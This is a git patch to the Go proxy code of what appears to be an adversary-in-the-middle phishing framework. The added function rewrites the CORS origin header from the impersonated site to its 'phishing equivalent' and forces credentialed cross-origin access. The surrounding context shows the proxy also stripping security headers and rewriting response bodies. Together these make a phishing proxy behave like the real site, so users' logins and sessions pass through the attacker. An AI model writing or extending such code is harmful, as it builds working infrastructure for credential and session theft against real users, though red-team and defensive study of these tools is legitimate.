From 4cf304a2d5474e45b744b600b7c462b24af12d47 Mon Sep 17 00:00:00 2001 From: Ronni Skansing Date: Sat, 4 Jul 2026 23:28:40 +0200 Subject: [PATCH] fix add cors to sessionless aitm requests Signed-off-by: Ronni Skansing --- backend/proxy/proxy.go | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/backend/proxy/proxy.go b/backend/proxy/proxy.go index 385c3cb..393a5eb 100644 --- a/backend/proxy/proxy.go +++ b/backend/proxy/proxy.go @@ -1061,6 +1061,7 @@ func (m *ProxyHandler) processResponseWithoutSessionContext(resp *http.Response, // apply basic response processing m.removeSecurityHeaders(resp) + m.rewriteCORSHeaderWithoutSession(resp, config) m.rewriteLocationHeaderWithoutSession(resp, config) m.applyCustomResponseHeaderReplacementsWithoutSession(resp, config, reqCtx.TargetDomain, reqCtx.ProxyConfig) m.rewriteResponseBodyWithoutSessionContext(resp, reqCtx, config) @@ -1155,6 +1156,25 @@ func (m *ProxyHandler) rewriteLocationHeaderWithoutSession(resp *http.Response, } } +// rewriteCORSHeaderWithoutSession maps the Access-Control-Allow-Origin host from +// the target to its phishing equivalent so cross origin requests that carry no +// proxy session still see an origin that matches the phishing host. A wildcard +// origin needs no rewrite. +func (m *ProxyHandler) rewriteCORSHeaderWithoutSession(resp *http.Response, config map[string]service.ProxyServiceDomainConfig) { + allowOrigin := resp.Header.Get("Access-Control-Allow-Origin") + if allowOrigin == "" || allowOrigin == "*" { + return + } + + if oURL, err := url.Parse(allowOrigin); err == nil { + if phishHost := m.replaceHostWithPhished(oURL.Host, config); phishHost != "" { + oURL.Host = phishHost + resp.Header.Set("Access-Control-Allow-Origin", oURL.String()) + } + } + resp.Header.Set("Access-Control-Allow-Credentials", "true") +} + func (m *ProxyHandler) rewriteResponseBodyWithoutSessionContext(resp *http.Response, reqCtx *RequestContext, configMap map[string]service.ProxyServiceDomainConfig) { contentType := resp.Header.Get("Content-Type") if !m.shouldProcessContent(contentType) {